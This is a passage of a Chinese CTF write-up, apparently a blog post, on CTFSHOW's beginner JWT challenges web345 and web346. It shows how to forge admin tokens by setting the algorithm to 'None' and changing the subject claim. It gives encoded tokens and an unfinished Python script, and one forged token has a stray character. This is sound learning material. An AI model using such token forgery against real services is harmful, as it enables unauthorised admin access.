【CTFSHOW】web入门 JWT

写在前面

陇剑杯初赛出了JWT专题的赛题,被同队大佬ak了,一直不太懂,来刷刷

JWT浅析

JWT即JSON WEB TOKEN,由三个部分组成,并用两个“.”进行连接。第一部分为header(base64加密),第二部分为payload(base64加密),第三部分为verify signature,它的构成如下:

JWT浅析2

HEADER中alg对应的加密方式为HS256,也可以选择其他对称或非对称的加密方式,大同小异。

PAYLOAD中一般包括用户信息。

Verify Signature中包括加密的密码。

JWT本质上是一种校验值,用来验证身份和数据是否被更改。

web345

查看源码得到hint:

/admin/

flag应该就在这。

抓包:

JWT345_抓包

其中auth也就是JWT的值为:

auth=eyJhbGciOiJOb25lIiwidHlwIjoiand0In0.W3siaXNzIjoiYWRtaW4iLCJpYXQiOjE2MzI2MjI1ODksImV4cCI6MTYzMjYyOTc4OSwibmJmIjoxNjMyNjIyNTg5LCJzdWIiOiJ1c2VyIiwianRpIjoiZDNlYjRlZTgyMThjMmNmZTVlMGQxMjM5MjNlNDc0M2EifV0

用.将值分开并进行base64解密,得到:

{"alg":"None","typ":"jwt"}
[{"iss":"admin","iat":1632622589,"exp":1632629789,"nbf":1632622589,"sub":"user","jti":"d3eb4ee8218c2cfe5e0d123923e4743a"}]

[{"iss":"admin","iat":1632622589,"exp":1632629789,"nbf":1632622589,"sub":"user","jti":"d3eb4ee8218c2cfe5e0d123923e4743a"}]

改为:

[{"sub":"admin"}]

并进行base64加密,然后与

eyJhbGciOiJOb25lIiwidHlwIjoiand0In0

进行拼接得到:

eyJhbGciOiJOb25lIiwidHlwIjoiand0In0A.W3sic3ViIjoiYWRtaW4ifV0

将auth参数的值修改并访问/admin/得到flag:

flag

web346

抓包得到:

auth=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJhZG1pbiIsImlhdCI6MTYzMjYyNjc4MiwiZXhwIjoxNjMyNjMzOTgyLCJuYmYiOjE2MzI2MjY3ODIsInN1YiI6InVzZXIiLCJqdGkiOiJiZTNmOGIyNTk5MDgxMWQzZmQ5NDAxODA0ZTgzNDI2MSJ9.ZYm_-gnvPWCZq8MSY0tB741URv13s34THxtOrcf-nE4

使用https://jwt.io/解密得到:

JWT346_解密

可以看到使用了加密算法HS256,我们可以把它设置为“None”,再把sub对应的值改为admin:

{"alg":"None","typ":"JWT"}.{
    "iss":"admin",
    "iat":1632635621,
    "exp":1632642821,
    "nbf":1632635621,
    "sub":"admin",
    "jti":"0a3fac5da5f0db3addcabaf6c8babc2a"
    }

使用python的jwt进行加密:

import jwt

# payload
token_dict = {
   
    "iss":"admin",
    "iat":1632635621,
    "exp":1632642821,
    "nbf":1632635621,
    "sub":"admin",
    "jti":"0a3fac5da5f0db3addcabaf6c8babc2a"
    }

评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

TurkeyMan

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值